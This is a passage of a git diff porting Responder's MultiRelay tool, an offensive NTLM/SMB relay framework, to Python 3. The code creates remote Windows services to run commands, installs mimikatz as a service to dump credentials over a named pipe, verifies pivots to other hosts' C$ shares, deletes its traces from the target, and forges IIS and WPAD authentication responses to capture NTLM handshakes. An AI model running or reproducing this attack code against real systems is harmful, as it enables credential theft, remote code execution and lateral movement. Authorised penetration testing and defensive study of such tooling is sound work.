- data,s,Output = ReadAndDelete(f, LogFile, data, s)
- print Output
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ time.sleep(1)
+ data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
+ data,s,Output = ReadAndDelete(f, LogFile, data, s)
+ print(Output)
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
- return data
+ Logs.info('Command executed:')
+ Logs.info(clientIP+","+Username+','+Command)
+ return data
except:
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
##########MimiKatz RPC#############
def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
global MimiKatzSVCID
global MimiKatzSVCName
try:
- DisplayGUID, DisplayGUIDle = Generateuuid()
- NamedPipe = GenerateNamedPipeName()
- RandomFName = GenerateRandomFileName()
- WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
- #Install mimikatz as a service.
- Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\\"+NamedPipe+" /guid:{"+DisplayGUID+"} /noreg\" service::me exit"
- MimiKatzSVCName = GenerateServiceName()
- MimiKatzSVCID = GenerateServiceID()
+ if isinstance(data, str):
+ data = data.encode('latin-1')
+ DisplayGUID, DisplayGUIDle = Generateuuid()
+ NamedPipe = GenerateNamedPipeName()
+ RandomFName = GenerateRandomFileName()
+ WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
+ #Install mimikatz as a service.
+ Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\\"+NamedPipe+" /guid:{"+DisplayGUID+"} /noreg\" service::me exit"
+ MimiKatzSVCName = GenerateServiceName()
+ MimiKatzSVCID = GenerateServiceID()
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = CreateMimikatzService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = CreateMimikatzService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s)
- data,s = CloseFID(f, data,s)
+ Logs.info('Command executed:')
+ Logs.info(clientIP+","+Username+','+Command)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
-
- return data, DisplayGUIDle, NamedPipe
+ return data, DisplayGUIDle, NamedPipe
except:
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
try:
- data,guid,namedpipe = InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
- data,s = SMBOpenPipe(Host, data, s)
- ##Wait for the pipe to come up..
- time.sleep(1)
+ data,guid,namedpipe = InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
+ data,s = SMBOpenPipe(Host, data, s)
+ ##Wait for the pipe to come up..
+ time.sleep(1)
- data,s,f = BindCall(guid, "\x01\x00", "\\"+namedpipe, data, s)
- data,s,f = MimiKatzRPC(Command, f, Host, data, s)
- data,s = SMBDCERPCCloseFID(f, data,s)
- #####
- #Kill the SVC now... Never know when the user will leave, so lets not leave anything on the target.
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = StopAndDeleteService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s)
- data,s = CloseFID(f, data,s)
- #Short sleep, to make sure the service had the time needed to stop before deleting mimikatz
- time.sleep(0.5)
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
+ data,s,f = BindCall(guid, "\x01\x00", "\\"+namedpipe, data, s)
+ data,s,f = MimiKatzRPC(Command, f, Host, data, s)
+ data,s = SMBDCERPCCloseFID(f, data,s)
+ #####
+ #Kill the SVC now... Never know when the user will leave, so lets not leave anything on the target.
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = StopAndDeleteService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ #Short sleep, to make sure the service had the time needed to stop before deleting mimikatz
+ time.sleep(0.5)
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
+ Logs.info('Command executed:')
+ Logs.info(clientIP+","+Username+','+Command)
- return ModifySMBRetCode(data)
+ return ModifySMBRetCode(data)
except:
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.")
+ return ModifySMBRetCode(data)
##########Pivot#############
def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath, RunAsFileName):
try:
- LocalIp = FindLocalIp()
- WinTmpPath = "%windir%\\Temp\\log.txt"
- Command = RunAsPath+" \"net view \\\\"+LocalIp+"\" \""+WinTmpPath+"\""
- ServiceNameChars = GenerateServiceName()
- ServiceIDChars = GenerateServiceID()
+ LocalIp = FindLocalIp()
+ WinTmpPath = "%windir%\\Temp\\log.txt"
+ Command = RunAsPath+" \"dir \\\\"+LocalIp+"\\C$\" \""+WinTmpPath+"\""
+ ServiceNameChars = GenerateServiceName()
+ ServiceIDChars = GenerateServiceID()
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
- data,s = CloseFID(f, data,s)
-
- ## We're leaving this host, clean it up..
- time.sleep(1.5)
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
- return data
+ ## We're leaving this host, clean it up..
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host)
+ Logs.info('Command executed:')
+ Logs.info(clientIP+","+Username+','+Command)
+ return data
except:
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
##########VerifyPivot#############
def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPath, RunAsFileName):
try:
- RandomFName = GenerateRandomFileName()
- ServiceNameChars = GenerateServiceName()
- ServiceIDChars = GenerateServiceID()
- WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
- LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
- Command = RunAsPath+" \"dir \\\\"+Pivot+"\\C$\" \""+WinTmpPath+"\""
+ RandomFName = GenerateRandomFileName()
+ ServiceNameChars = GenerateServiceName()
+ ServiceIDChars = GenerateServiceID()
+ WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt"
+ LogFile = "\\Windows\\Temp\\"+RandomFName+".txt"
+ Command = RunAsPath+" \"dir \\\\"+Pivot+"\\C$\" \""+WinTmpPath+"\""
- data,s = SMBOpenPipe(Host, data, s)
- data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
- data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
- data,s = CloseFID(f, data,s)
- data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
- data,s,Output = ReadAndDelete(f, LogFile, data, s)
- data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host)
+ data,s = SMBOpenPipe(Host, data, s)
+ data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s)
+ data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s)
+ data,s = CloseFID(f, data,s)
+ time.sleep(1)
+ data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
+ data,s,Output = ReadAndDelete(f, LogFile, data, s)
+ data = DeleteFile(data, s, "\\Windows\\Temp\\"+RunAsFileName, Host)
- Logs.info('Command executed:')
- Logs.info(clientIP+","+Username+','+Command)
+ Logs.info('Command executed:')
+ Logs.info(clientIP+","+Username+','+Command)
- if re.findall('Volume in drive', Output):
- return True, data
- else:
- return False, data
+ if re.findall('Volume in drive', Output):
+ return True, data
+ else:
+ return False, data
except:
- #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
- print "[+] Something went wrong, try something else."
- return ModifySMBRetCode(data)
+ #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
+ print("[+] Something went wrong, try something else.")
+ return ModifySMBRetCode(data)
##########DoSomethingDumb#############
def DumbSMBChain(data, s, Host):
try:
- File = "/Windows/win.ini"
- File = File.replace("/","\\")
- data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
- data,s,Output = GrabAndRead(f, File, data, s)
- data, s = CloseTID(data, s)
- return ModifySMBRetCode(data) ##Command was successful, ret true.
+ File = "/Windows/win.ini"
+ File = File.replace("/","\\")
+ data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
+ data,s,Output = GrabAndRead(f, File, data, s)
+ data, s = CloseTID(data, s)
+ return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
- return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
-
+ return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
diff --git a/tools/MultiRelay/RelayMultiPackets.py b/tools/MultiRelay/RelayMultiPackets.py
index bba63a3..2aa164e 100644
--- a/tools/MultiRelay/RelayMultiPackets.py
+++ b/tools/MultiRelay/RelayMultiPackets.py
@@ -1,5 +1,6 @@
#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
@@ -16,24 +17,39 @@
# along with this program. If not, see .
import struct
import os
+import sys
from odict import OrderedDict
import datetime
from base64 import b64decode, b64encode
+# Packet class handling all packet generation (see odict.py).
class Packet():
- fields = OrderedDict([
- ("data", ""),
- ])
- def __init__(self, **kw):
- self.fields = OrderedDict(self.__class__.fields)
- for k,v in kw.items():
- if callable(v):
- self.fields[k] = v(self.fields[k])
- else:
- self.fields[k] = v
- def __str__(self):
- return "".join(map(str, self.fields.values()))
+ fields = OrderedDict([
+ ("data", ""),
+ ])
+ def __init__(self, **kw):
+ self.fields = OrderedDict(self.__class__.fields)
+ for k,v in kw.items():
+ if callable(v):
+ self.fields[k] = v(self.fields[k])
+ else:
+ self.fields[k] = v
+ def __str__(self):
+ return "".join(map(str, self.fields.values()))
+#Python version
+if (sys.version_info > (3, 0)):
+ PY2OR3 = "PY3"
+else:
+ PY2OR3 = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+ #Python2...
+ if PY2OR3 is "PY2":
+ return struct.pack(endian, data)
+ #Python3...
+ else:
+ return struct.pack(endian, data).decode('latin-1')
##################HTTP Proxy Relay##########################
def HTTPCurrentDate():
@@ -42,178 +58,176 @@ def HTTPCurrentDate():
#407 section.
class WPAD_Auth_407_Ans(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 407 Unauthorized\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
- ("Connection", "Proxy-Connection: close\r\n"),
- ("Cache-Control", "Cache-Control: no-cache\r\n"),
- ("Pragma", "Pragma: no-cache\r\n"),
- ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 407 Unauthorized\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
+ ("Connection", "Proxy-Connection: close\r\n"),
+ ("Cache-Control", "Cache-Control: no-cache\r\n"),
+ ("Pragma", "Pragma: no-cache\r\n"),
+ ("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("CRLF", "\r\n"),
+ ])
class WPAD_NTLM_Challenge_Ans(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 407 Unauthorized\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWWAuth", "Proxy-Authenticate: NTLM "),
- ("Payload", ""),
- ("Payload-CRLF", "\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 407 Unauthorized\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWWAuth", "Proxy-Authenticate: NTLM "),
+ ("Payload", ""),
+ ("Payload-CRLF", "\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("CRLF", "\r\n"),
+ ])
- def calculate(self,payload):
- self.fields["Payload"] = b64encode(payload)
+ def calculate(self,payload):
+ self.fields["Payload"] = b64encode(payload)
#401 section:
class IIS_Auth_401_Ans(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("CRLF", "\r\n"),
+ ])
class IIS_Auth_Granted(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 200 OK\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
- ("ContentLen", "Content-Length: "),
- ("ActualLen", "76"),
- ("CRLF", "\r\n\r\n"),
- ("Payload", "\n\n\n\n
\n\n\n"),
- ])
- def calculate(self):
- self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 200 OK\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
+ ("ContentLen", "Content-Length: "),
+ ("ActualLen", "76"),
+ ("CRLF", "\r\n\r\n"),
+ ("Payload", "\n\n\n\n\n\n\n"),
+ ])
+ def calculate(self):
+ self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class IIS_NTLM_Challenge_Ans(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWWAuth", "WWW-Authenticate: NTLM "),
- ("Payload", ""),
- ("Payload-CRLF", "\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWWAuth", "WWW-Authenticate: NTLM "),
+ ("Payload", ""),
+ ("Payload-CRLF", "\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("CRLF", "\r\n"),
+ ])
- def calculate(self,payload):
- self.fields["Payload"] = b64encode(payload)
+ def calculate(self,payload):
+ self.fields["Payload"] = b64encode(payload)
class IIS_Basic_401_Ans(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("Type", "Content-Type: text/html\r\n"),
- ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
- ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
- ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 401 Unauthorized\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("Type", "Content-Type: text/html\r\n"),
+ ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
+ ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
+ ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("CRLF", "\r\n"),
+ ])
##################WEBDAV Relay Packet#########################
class WEBDAV_Options_Answer(Packet):
- fields = OrderedDict([
- ("Code", "HTTP/1.1 200 OK\r\n"),
- ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
- ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
- ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
- ("Len", "Content-Length: 0\r\n"),
- ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
- ("Connection", "Connection: Keep-Alive\r\n"),
- ("Content-Type", "Content-Type: text/html\r\n"),
- ("CRLF", "\r\n"),
- ])
+ fields = OrderedDict([
+ ("Code", "HTTP/1.1 200 OK\r\n"),
+ ("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
+ ("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
+ ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
+ ("Len", "Content-Length: 0\r\n"),
+ ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
+ ("Connection", "Connection: Keep-Alive\r\n"),
+ ("Content-Type", "Content-Type: text/html\r\n"),
+ ("CRLF", "\r\n"),
+ ])
##################SMB Relay Packet############################
def midcalc(data): #Set MID SMB Header field.
- return data[34:36]
+ return data[34:36].decode('latin-1')
def uidcalc(data): #Set UID SMB Header field.
- return data[32:34]
+ return data[32:34].decode('latin-1')
def pidcalc(data): #Set PID SMB Header field.
- pack=data[30:32]
- return pack
+ return data[30:32].decode('latin-1')
def tidcalc(data): #Set TID SMB Header field.
- pack=data[28:30]
- return pack
+ return data[28:30].decode('latin-1')
#Response packet.
class SMBRelayNegoAns(Packet):
- fields = OrderedDict([
- ("Wordcount", "\x11"),
- ("Dialect", ""),
- ("Securitymode", "\x03"),
- ("MaxMpx", "\x32\x00"),
- ("MaxVc", "\x01\x00"),
- ("MaxBuffSize", "\x04\x41\x00\x00"),
- ("MaxRawBuff", "\x00\x00\x01\x00"),
- ("SessionKey", "\x00\x00\x00\x00"),
- ("Capabilities", "\xfd\xf3\x01\x80"),
- ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
- ("SrvTimeZone", "\xf0\x00"),
- ("KeyLen", "\x00"),
- ("Bcc", "\x10\x00"),
- ("Guid", os.urandom(16)),
- ])
+ fields = OrderedDict([
+ ("Wordcount", "\x11"),
+ ("Dialect", ""),
+ ("Securitymode", "\x03"),
+ ("MaxMpx", "\x32\x00"),
+ ("MaxVc", "\x01\x00"),
+ ("MaxBuffSize", "\x04\x41\x00\x00"),
+ ("MaxRawBuff", "\x00\x00\x01\x00"),
+ ("SessionKey", "\x00\x00\x00\x00"),
+ ("Capabilities", "\xfd\xf3\x01\x80"),
+ ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
+ ("SrvTimeZone", "\xf0\x00"),
+ ("KeyLen", "\x00"),
+ ("Bcc", "\x10\x00"),
+ ("Guid", os.urandom(16).decode('latin-1')),
+ ])
##Response packet.
class SMBRelayNTLMAnswer(Packet):
- fields = OrderedDict([
- ("Wordcount", "\x04"),
- ("AndXCommand", "\xff"),
- ("Reserved", "\x00"),
- ("Andxoffset", "\x5f\x01"),
- ("Action", "\x00\x00"),
- ("SecBlobLen", "\xea\x00"),
- ("Bcc", "\x34\x01"),
- ###NTLMPACKET
- ("Data", ""),
- ###NTLMPACKET
+ fields = OrderedDict([
+ ("Wordcount", "\x04"),
+ ("AndXCommand", "\xff"),
+ ("Reserved", "\x00"),
+ ("Andxoffset", "\x5f\x01"),
+ ("Action", "\x00\x00"),
+ ("SecBlobLen", "\xea\x00"),
+ ("Bcc", "\x34\x01"),
+ ###NTLMPACKET
+ ("Data", ""),
+ ###NTLMPACKET
- ])
+ ])
#Request packet (no calc):
class SMBSessionSetupAndxRequest(Packet):
- fields = OrderedDict([
- ("Wordcount", "\x0c"),
- ("AndXCommand", "\xff"),
- ("Reserved","\x00" ),
- ("AndXOffset", "\xec\x00"),
- ("MaxBuff","\xff\xff"),
- ("MaxMPX", "\x32\x00"),
- ("VCNumber","\x00\x00"),
- ("SessionKey", "\x00\x00\x00\x00"),
- ###NTLMPACKET
- ("Data", ""),
- ###NTLMPACKET
- ])
+ fields = OrderedDict([
+ ("Wordcount", "\x0c"),
+ ("AndXCommand", "\xff"),
+ ("Reserved","\x00" ),
+ ("AndXOffset", "\xec\x00"),
+ ("MaxBuff","\xff\xff"),
+ ("MaxMPX", "\x32\x00"),
+ ("VCNumber","\x00\x00"),
+ ("SessionKey", "\x00\x00\x00\x00"),
+ ###NTLMPACKET
+ ("Data", ""),
+ ###NTLMPACKET
+ ])
class SMBSessEmpty(Packet):
- fields = OrderedDict([
- ("Empty", "\x00\x00\x00"),
- ])
+ fields = OrderedDict([
+ ("Empty", "\x00\x00\x00"),
+ ])
##################SMB Request Packet##########################
class SMBHeader(Packet):
fields = OrderedDict([
@@ -237,9 +251,9 @@ class SMBNegoCairo(Packet):
("Bcc", "\x62\x00"),
("Data", "")
])
-
+
def calculate(self):
- self.fields["Bcc"] = struct.pack(" 255:
- self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
- self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
+ self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
+ self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-0)
else:
- self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
- self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
+ self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
+ self.fields["ApplicationHeaderLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-3)
if len(NTLMData)-8 > 255:
- self.fields["AsnSecMechLenOfLen"] = "\x82"
- self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
+ self.fields["AsnSecMechLenOfLen"] = "\x82"
+ self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-4)
else:
- self.fields["AsnSecMechLenOfLen"] = "\x81"
- self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
+ self.fields["AsnSecMechLenOfLen"] = "\x81"
+ self.fields["AsnSecMechLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-6)
if len(NTLMData)-12 > 255:
- self.fields["ChoosedTagLenOfLen"] = "\x82"
- self.fields["ChoosedTagLen"] = struct.pack(">H", len(SecurityBlobLen)-8)
+ self.fields["ChoosedTagLenOfLen"] = "\x82"
+ self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-8)
else:
- self.fields["ChoosedTagLenOfLen"] = "\x81"
- self.fields["ChoosedTagLen"] = struct.pack(">B", len(SecurityBlobLen)-9)
+ self.fields["ChoosedTagLenOfLen"] = "\x81"
+ self.fields["ChoosedTagLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-9)
if len(NTLMData)-16 > 255:
- self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
- self.fields["ChoosedTag1StrLen"] = struct.pack(">H", len(SecurityBlobLen)-12)
+ self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
+ self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">H", len(SecurityBlobLen)-12)
else:
- self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
- self.fields["ChoosedTag1StrLen"] = struct.pack(">B", len(SecurityBlobLen)-12)
+ self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
+ self.fields["ChoosedTag1StrLen"] = StructWithLenPython2or3(">B", len(SecurityBlobLen)-12)
CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])+str(self.fields["NLMPAuthMsgNull"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["ExtraNull"])+str(self.fields["NativeLan"])+str(self.fields["NativeLanTerminator"])
